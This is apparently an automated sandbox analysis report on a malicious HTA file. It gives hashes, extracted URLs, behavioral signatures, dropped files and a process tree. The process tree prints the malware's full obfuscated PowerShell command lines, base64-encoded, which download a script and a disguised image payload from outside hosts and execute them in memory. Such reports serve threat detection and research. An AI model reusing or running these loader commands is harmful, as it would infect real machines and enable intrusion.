Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
18-12-2024 02:43
Behavioral task
behavioral1
Sample
7467651082b81c0e0ac5c64b4821fcd49070b5d15c88e1a716f948bdac88b544.hta
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
7467651082b81c0e0ac5c64b4821fcd49070b5d15c88e1a716f948bdac88b544.hta
Resource
win10v2004-20241007-en
General
-
Target
7467651082b81c0e0ac5c64b4821fcd49070b5d15c88e1a716f948bdac88b544.hta
-
Size
144KB
-
MD5
920910732ff13da38fab9224e65041d6
-
SHA1
844226d370dc471fa282eaad9e8dabaf59963902
-
SHA256
7467651082b81c0e0ac5c64b4821fcd49070b5d15c88e1a716f948bdac88b544
-
SHA512
1efe02ba682bd628bacebebe8f283276c1ebc6db3bcc3956c59b840d3677d94a6ca18f95182daf8a5d1587a830b2a2cc69d6a9c31a2672c29f8aa294e19cebf7
-
SSDEEP
768:t1EQuPoGCMum2oum2H5KUJDVUKhCoGVf/Atu360KuBxvmm0wYWzP9k4/k4/k4/kk:tG
Malware Config
Extracted
https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpg%20
https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpg%20
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 3 2708 powershell.exe 6 1972 powershell.exe 8 1972 powershell.exe -
Evasion via Device Credential Deployment 1 IoCs
pid Process 2708 powershell.exe -
pid Process 1972 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2708 powershell.exe 1972 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2708 powershell.exe Token: SeDebugPrivilege 1972 powershell.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 2084 wrote to memory of 1064 2084 mshta.exe 30 PID 2084 wrote to memory of 1064 2084 mshta.exe 30 PID 2084 wrote to memory of 1064 2084 mshta.exe 30 PID 2084 wrote to memory of 1064 2084 mshta.exe 30 PID 1064 wrote to memory of 2708 1064 cmd.exe 32 PID 1064 wrote to memory of 2708 1064 cmd.exe 32 PID 1064 wrote to memory of 2708 1064 cmd.exe 32 PID 1064 wrote to memory of 2708 1064 cmd.exe 32 PID 2708 wrote to memory of 2664 2708 powershell.exe 33 PID 2708 wrote to memory of 2664 2708 powershell.exe 33 PID 2708 wrote to memory of 2664 2708 powershell.exe 33 PID 2708 wrote to memory of 2664 2708 powershell.exe 33 PID 2664 wrote to memory of 2896 2664 csc.exe 34 PID 2664 wrote to memory of 2896 2664 csc.exe 34 PID 2664 wrote to memory of 2896 2664 csc.exe 34 PID 2664 wrote to memory of 2896 2664 csc.exe 34 PID 2708 wrote to memory of 1328 2708 powershell.exe 36 PID 2708 wrote to memory of 1328 2708 powershell.exe 36 PID 2708 wrote to memory of 1328 2708 powershell.exe 36 PID 2708 wrote to memory of 1328 2708 powershell.exe 36 PID 1328 wrote to memory of 1972 1328 WScript.exe 37 PID 1328 wrote to memory of 1972 1328 WScript.exe 37 PID 1328 wrote to memory of 1972 1328 WScript.exe 37 PID 1328 wrote to memory of 1972 1328 WScript.exe 37
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\7467651082b81c0e0ac5c64b4821fcd49070b5d15c88e1a716f948bdac88b544.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2084 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/C pOwErSheLl -eX UNrEsTRiCTeD -nop -w 1 -c dEVicecReDENTiAlDePLoymENt ; iNvOkE-exPRESSion($(inVOke-eXpResSIOn('[sYSTeM.tEXt.ENcodInG]'+[cHar]58+[CHAr]58+'UTf8.gEtsTrInG([sYstem.cOnvErt]'+[chAR]0x3a+[cHAR]58+'fRomBASe64sTRiNG('+[chaR]34+'JEU2UjVuZzltV0sgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQmVyZEVGSU5JdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVWNYSWF1bmJwLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3VCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2VibUNiUm9qWnksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYVXRRSUt0TXdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOaFpXcnNRcSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAielRXUFRRV3oiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lU3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUk1SYmloTWttdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRFNlI1bmc5bVdLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjMuOTUuMjM1LjI5LzQzOS93ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzZm9ybWV0b2dldC50SUYiLCIkZU52OkFQUERBVEFcd2VhcmV1c2luZ2dvb2Rjb21wYW5pZXNmb3JnaWZpdGluZ2Jlc3RoaW5ncy52YlMiLDAsMCk7U3RhUnQtU2xlZXAoMyk7SU52T0tlLWV4UFJFc1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVx3ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzLnZiUyI='+[CHar]34+'))')))"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1064 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepOwErSheLl -eX UNrEsTRiCTeD -nop -w 1 -c dEVicecReDENTiAlDePLoymENt ; iNvOkE-exPRESSion($(inVOke-eXpResSIOn('[sYSTeM.tEXt.ENcodInG]'+[cHar]58+[CHAr]58+'UTf8.gEtsTrInG([sYstem.cOnvErt]'+[chAR]0x3a+[cHAR]58+'fRomBASe64sTRiNG('+[chaR]34+'JEU2UjVuZzltV0sgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQmVyZEVGSU5JdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVWNYSWF1bmJwLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3VCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2VibUNiUm9qWnksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYVXRRSUt0TXdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOaFpXcnNRcSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAielRXUFRRV3oiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lU3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUk1SYmloTWttdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRFNlI1bmc5bVdLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjMuOTUuMjM1LjI5LzQzOS93ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzZm9ybWV0b2dldC50SUYiLCIkZU52OkFQUERBVEFcd2VhcmV1c2luZ2dvb2Rjb21wYW5pZXNmb3JnaWZpdGluZ2Jlc3RoaW5ncy52YlMiLDAsMCk7U3RhUnQtU2xlZXAoMyk7SU52T0tlLWV4UFJFc1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVx3ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzLnZiUyI='+[CHar]34+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2708 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\u7cfw4g4.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2664 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7FD.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC7FC.tmp"5⤵
- System Location Discovery: System Language Discovery
PID:2896
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\weareusinggoodcompaniesforgifitingbesthings.vbS"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1328 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $antimagistrical = 'JGVmZm9ydGxlc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskY2FyZGlnYW5zID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskc3BoYWNlbGlhID0gJGNhcmRpZ2Fucy5Eb3dubG9hZERhdGEoJGVmZm9ydGxlc3MpOyRjb3NtZWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkc3BoYWNlbGlhKTskZG9vbXNheWVycyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskcmVzdGFnbmF0aW9uID0gJzw8QkFTRTY0X0VORD4+JzskS2FzaHViaWFuID0gJGNvc21lYS5JbmRleE9mKCRkb29tc2F5ZXJzKTskxZNjb25vbXVzID0gJGNvc21lYS5JbmRleE9mKCRyZXN0YWduYXRpb24pOyRLYXNodWJpYW4gLWdlIDAgLWFuZCAkxZNjb25vbXVzIC1ndCAkS2FzaHViaWFuOyRLYXNodWJpYW4gKz0gJGRvb21zYXllcnMuTGVuZ3RoOyRvdmVybW9kdWxhdGVkID0gJMWTY29ub211cyAtICRLYXNodWJpYW47JHJlZnJpZ2VyYXRvcnkgPSAkY29zbWVhLlN1YnN0cmluZygkS2FzaHViaWFuLCAkb3Zlcm1vZHVsYXRlZCk7JHVuYW5jaG9yZWQgPSAtam9pbiAoJHJlZnJpZ2VyYXRvcnkuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHJlZnJpZ2VyYXRvcnkuTGVuZ3RoKV07JHNwaXJpbGx1bXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCR1bmFuY2hvcmVkKTskeHlsb2xpdGUgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRzcGlyaWxsdW1zKTskcGhvc3BoYXRpemVzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHBob3NwaGF0aXplcy5JbnZva2UoJG51bGwsIEAoJzAvd21NdEgvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRjZWRhcnMnLCAnJGNlZGFycycsICckY2VkYXJzJywgJ0Nhc1BvbCcsICckY2VkYXJzJywgJyRjZWRhcnMnLCckY2VkYXJzJywnJGNlZGFycycsJyRjZWRhcnMnLCckY2VkYXJzJywnJGNlZGFycycsJzEnLCckY2VkYXJzJywnJykpOw==';$periblem = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($antimagistrical));Invoke-Expression $periblem5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1972
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
1KB
MD575ecf437d92921ef4bd8de8dc2450750
SHA1e69c0b687ba038f9ac83a31d37a1b99e13e3c9b7
SHA256ab97ba48a9414c25f7642899ab703c0fdc86e14b081a36c8e1681769bdd09d0b
SHA512af2927e6c148d4d638dd3790f1fbb6f25788dea4f2049dfc5633173e594409bd0127e76b74a54442d5d15a528cf77ecbbddbc7ba4510572915d852d185e2a299
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
3KB
MD5bc28a2a9890e1025d6c2ac433dfee84a
SHA1a04edb12025a70bed58c65f27e30c89a2da5203c
SHA256b267f4dc70623547eae53ebd75cbd6b2908bed5c663b03a1782231311fb94499
SHA5122ab100d985820c542e397adff3253ccf4cb55fdd6b92d151a1588711b38701fead0951324c8a0ff7aec4668f6790fe0cfca286d37b841a2602a2a9bbbb117e86
-
Filesize
7KB
MD5ba5827d7d50a1adb7691e8429dabb3b2
SHA1d9a7fdbe27a0b3f2e41b1f3f3564f7f5cc178788
SHA256f9afb965ed6b2e7e077aad10812c1bcd230d8b6aa55725710272b940717fc7bc
SHA512827bb8a3caa1a4f30dfc016c41459242bb9dcbe84d33a04795b201429027e1dfc620d4d1ec18b440fcffeb1fe899fb81f794bbde216304b7b247414c65be0660
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5efaa693f4d88f0d91bedc6deee32091e
SHA1dc86ff5192831cbdc10c3794b9785f319d847448
SHA256046ca604e78a22f6e86016f51cc380326653280dabd54cdfe8cff2e2238ebe4a
SHA51262e17b76d6759ebee0b2b2c034e111866c092af56d602a0a7a5f26e0ff3add8441d0367d095197621ad69ebd30191054502db7ef3a3e8ba7e9719db35302bed2
-
Filesize
150KB
MD5622118455f9b3d92190edecb9f5a70e4
SHA1ec47a3f75a1a3e197a2745f75015160da5190d76
SHA256d9b6d65cd5e6206ccb41a4d12a0a1cf8d55de31d786cf085d9632e5eaf66914a
SHA5123af7582cd5b8e7ddd5c23f5477fa3f595fdb851e0b7faf51f167c716b0a50ca4cc6af824b8409ca5745ccc72bc56bbfe201c3b6a7630f04a6e2e84ee248bcf91
-
Filesize
652B
MD5886020f1beb3a4ddeaf9e1d0c0da7002
SHA190ef5cdc962439f342945c62f85e12619974b55e
SHA256512eb64a1509d5f94796c772fe43eb9aedf7ebc920a51e475ab54e24a73bd4cf
SHA51279be771a059c74408087edda1333a18f2648b51b90e1a1666f13b3f3b358096419ad6143f6d1b9409de694cf6fd39f8a583fce900ad6cc8580698f61a0506105
-
Filesize
498B
MD5dcfc222ae4a88432f5653314f96c284c
SHA1f38c92dfe6c331d9eede174861c22b5cb24d1236
SHA25665b8df15d3df5605ff17738e203c4ad07a534be67bbb493d36a5ef1cbff2733e
SHA51275d2ace08f5908213cf61ccc5c378871d0b5ce47e98221e8c49f4f758216ae0a606799064011011d713c0187c2722700f808fe5138a0cd4320870251c70ecaf7
-
Filesize
309B
MD55ed5124f480ab41332452df05730c183
SHA1137d0d2e82591bd07e9870d29cf8b4832b21d3f9
SHA2561930704fb596fa64ba23a0f22602738e7d0923073721f6c008c2c34718d16093
SHA512016a080417cf581822e5e848f658b54c5a4dac7288dbc03e151558c428ebc83323fd18cecdf2fb11104fbe068920382e62f49db891ac989a1ce624fef9930aa2